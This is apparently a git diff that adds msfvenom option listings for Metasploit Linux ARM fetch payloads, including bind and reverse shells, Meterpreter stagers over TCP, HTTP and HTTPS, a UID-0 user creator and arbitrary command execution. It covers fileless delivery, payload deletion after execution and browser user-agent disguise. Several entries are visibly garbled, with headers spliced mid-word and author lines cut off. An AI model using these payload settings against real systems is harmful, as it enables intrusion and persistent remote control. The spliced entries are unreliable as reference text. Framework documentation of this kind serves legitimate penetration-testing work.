ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-armbe-shell_bind_tcp.txt b/msfvenom/payload_options/cmd-linux-tftp-armbe-shell_bind_tcp.txt new file mode 100644 index 0000000..b44bd88 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-armbe-shell_bind_tcp.txt @@ -0,0 +1,72 @@ + + Name: TFTP Fetch, Linux ARM Big Endian Command Shell, Bind TCP Inline + Module: payload/cmd/linux/tftp/armbe/shell_bind_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 0 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Balazs Bucsay @xoreipeip + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +CMD /bin/sh yes The command to execute. +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME JyZiePnISfv no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an ARMBE payload from a TFTP server. + Listen for a connection and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-armle-adduser.txt b/msfvenom/payload_options/cmd-linux-tftp-armle-adduser.txt new file mode 100644 index 0000000..c946b7c --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-armle-adduser.txt @@ -0,0 +1,70 @@ + + Name: TFTP Fetch, Linux Add User + Module: payload/cmd/linux/tftp/armle/adduser + Platform: Linux + Arch: cmd +Needs Admin: Yes + Total size: 111 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Jonathan Salwan + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +PASS metasploit yes The password for this user +SHELL /bin/sh no The shell for this user +USER metasploit yes The username to create + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME FAKzIflLhDN no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an ARMLE payload from a TFTP server. + Create a new user with UID 0 + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-armle-exec.txt b/msfvenom/payload_options/cmd-linux-tftp-armle-exec.txt new file mode 100644 index 0000000..1d141e6 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-armle-exec.txt @@ -0,0 +1,68 @@ + + Name: TFTP Fetch, Linux Execute Command + Module: payload/cmd/linux/tftp/armle/exec + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 108 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Jonathan Salwan + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +CMD yes The command string to execute +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME OsoXsmpBmL no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an ARMLE payload from a TFTP server. + Execute an arbitrary command + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-armle-meterpreter-bind_tcp.txt b/msfvenom/payload_options/cmd-linux-tftp-armle-meterpreter-bind_tcp.txt new file mode 100644 index 0000000..f2083e2 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-armle-meterpreter-bind_tcp.txt @@ -0,0 +1,96 @@ + + Name: TFTP Fetch, Bind TCP Stager + Module: payload/cmd/linux/tftp/armle/meterpreter/bind_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 114 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Adam Cammack + nemo + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME mSdkFloTxERi no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an ARMLE payload from a TFTP server. + Listen for a connection + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-armle-meterpreter-reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-tftp-armle-meterpreter-reverse_tcp.txt new file mode 100644 index 0000000..eed09e2 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-armle-meterpreter-reverse_tcp.txt @@ -0,0 +1,102 @@ + + Name: TFTP Fetch, Reverse TCP Stager + Module: payload/cmd/linux/tftp/armle/meterpreter/reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 102 + Rank: Nor +Evasion options for payload/cmd/linux/tftp/armle/meterpreter/reverse_tcp: +========================= + + nemo + tkmru + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME IRkTbQtl no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an ARMLE payload from a TFTP server. + Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-armle-meterpreter_reverse_http.txt b/msfvenom/payload_options/cmd-linux-tftp-armle-meterpreter_reverse_http.txt new file mode 100644 index 0000000..777cd36 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-armle-meterpreter_reverse_http.txt @@ -0,0 +1,104 @@ + + Name: TFTP Fetch + Module: payload/cmd/linux/tftp/armle/meterpreter_reverse_http + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 111 + Rank: Normal + +Provided by: + +Evasion options for payload/cmd/linux/tftp/armle/meterpreter_reverse_http: +========================= + +cook@rapid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8080 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME XFItGigtDyI no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an ARMLE payload from a TFTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 14_7_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-armle-meterpreter_reverse_https.txt b/msfvenom/payload_options/cmd-linux-tftp-armle-meterpreter_reverse_https.txt new file mode 100644 index 0000000..5df1244 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-armle-meterpreter_reverse_https.txt @@ -0,0 +1,106 @@ + + Name: TFTP Fetch + Module: payload/cmd/linux/tftp/armle/meterpreter_reverse_https + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 111 + Rank: Normal + +Provided by: + +Evasion options for payload/cmd/linux/tftp/armle/meterpreter_reverse_https: +========================= + +ok@rapid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8443 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME dOyIZBnzJJP no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an ARMLE payload from a TFTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-armle-meterpreter_reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-tftp-armle-meterpreter_reverse_tcp.txt new file mode 100644 index 0000000..1753df4 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-armle-meterpreter_reverse_tcp.txt @@ -0,0 +1,97 @@ + + Name: TFTP Fetch + Module: 